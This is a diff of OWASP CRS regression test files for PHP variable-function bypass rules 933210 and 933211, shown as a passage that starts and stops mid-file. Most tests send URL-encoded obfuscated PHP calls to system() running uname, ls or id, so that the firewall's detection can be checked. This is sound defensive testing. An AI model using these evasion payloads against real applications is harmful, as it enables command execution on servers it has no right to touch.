text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(foo)/(bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(foo)/(bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(/foo)/(/bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(/foo)/(/bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 19 desc: Check FP if text contains quotes and round parenthesis stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" - version: "HTTP/1.1" - output: - no_log_contains: id "933210" - - test_title: 933210-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?search=this+is+a+%22dog%22+%28not+a+cat%29" + version: "HTTP/1.1" + output: + no_log_contains: id "933210" + - test_id: 20 desc: Block function call via string stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22system%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" - - test_title: 933210-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22system%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" + - test_id: 21 desc: Block function call via string using hex escape sequence stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933210" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933210" diff --git a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml index 837538cfd..0126b067f 100644 --- a/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml +++ b/tests/regression/tests/REQUEST-933-APPLICATION-ATTACK-PHP/933211.yaml @@ -2,344 +2,322 @@ meta: author: "karelorigin, azurit" description: Test for "933211" PHP Variable Function bypass - enabled: true - name: 933211.yaml +rule_id: 933211 tests: - - test_title: 933211-1 + - test_id: 1 desc: Check for false positive 1 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-2 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bACME%5d%3a+this+is%2c+%28another%29+test+%28foo%29bar+or+foo%28bar%29." + version: "HTTP/1.1" + output: + no_log_contains: id "933211" + - test_id: 2 desc: Check for false positive 2 stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-3 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28foo%29bar+or+foo%28bar%29+or+%5bfoo%5dbar+or+foo%5bbar%5d" + version: "HTTP/1.1" + output: + no_log_contains: id "933211" + - test_id: 3 desc: PHP Variable Function bypass "(system)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-4 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28%27uname%27%29%20%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 4 desc: PHP Variable Function bypass "(sy.(st).em)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-5 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28sy.%28st%29.em%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 5 desc: PHP Variable Function bypass "(string)'system'('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-6 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29%22system%22%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 6 desc: PHP Variable Function bypass "( string ) 'sys'.'t'.'em' ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-7 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28+string+%29+%22sys%22.%22t%22.%22em%22+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 7 desc: PHP Variable Function bypass "(string) {[system][0]} ('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-8 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28string%29+%7b%5bsystem%5d%5b0%5d%7d+%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 8 desc: PHP Variable Function bypass "define('x', 'sys' . 'tem');(x)/* comment */('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-9 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27x%27,+%27sys%27+.+%27tem%27%29%3b%28x%29%2f*+comment+*%2f%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 9 desc: PHP Variable Function bypass "$y = 'sys'.'tem';($y)('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-10 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=$y+=+%27sys%27.%27tem%27%3b%28$y%29%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 10 desc: PHP Variable Function bypass "define('z', [['sys' .'tem']]);(z)[0][0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-11 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=define%28%27z%27,+%5b%5b%27sys%27+.%27tem%27%5d%5d%29%3b%28z%29%5b0%5d%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 11 desc: PHP Variable Function bypass "(system)(ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28system%29%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-12 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28system%29%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 12 desc: PHP Variable Function bypass "(/* comment */system)(ls/* comment */)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-13 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%2f*+comment+*%2fsystem%29%28ls%2f*+comment+*%2f%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 13 desc: PHP Variable Function bypass "[system][0](ls)" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-14 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5bsystem%5d%5b0%5d%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 14 desc: PHP Variable Function bypass "[ system ] [ 0 ] ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-15 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%5b+system+%5d+%5b+0+%5d+%28+ls+%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 15 desc: PHP Variable Function bypass "(['system'])[0]('uname')" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-16 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28%5b%27system%27%5d%29%5b0%5d%28%27uname%27%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 16 desc: PHP Variable Function bypass "( [ system ][ 0 ]) {/* comment */0} ( ls )" stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-17 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?x=%28++%5b++system++%5d%5b++0++%5d%29++%7b%2f*+comment+*%2f0%7d++%28++ls++%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 17 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(foo)/(bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-18 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(foo)/(bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933211" + - test_id: 18 desc: Check FP if Cookie contains '/' (slash) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Cookie: "x=(/foo)/(/bar)" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get" - version: "HTTP/1.1" - output: - no_log_contains: id "933211" - - test_title: 933211-19 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Cookie: "x=(/foo)/(/bar)" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get" + version: "HTTP/1.1" + output: + no_log_contains: id "933211" + - test_id: 19 desc: Block function call via string stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22system%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-20 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22system%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 20 desc: Block function call via string using hex escape sequence stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" - version: "HTTP/1.1" - output: - log_contains: id "933211" - - test_title: 933211-21 + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: "/get?code=%22%5Cx73y%5Cx73tem%22%28ls%29%3B" + version: "HTTP/1.1" + output: + log_contains: id "933211" + - test_id: 21 desc: Block function call bypass '(sy.(st).em)(@id)' (without trailing semi-colon) stages: - - stage: - input: - dest_addr: 127.0.0.1 - headers: - Host: localhost - User-Agent: "OWASP CRS test agent" - Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 - method: "GET" - port: 80 - uri: "/get?code=(sy.(st).em)(%40id)" - version: "HTTP/1.1" - output: - log_contains: id "933211" + - input: + dest_addr: 127.0.0.1 + headers: + Host: localhost + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + method: "GET" + port: 80 + uri: 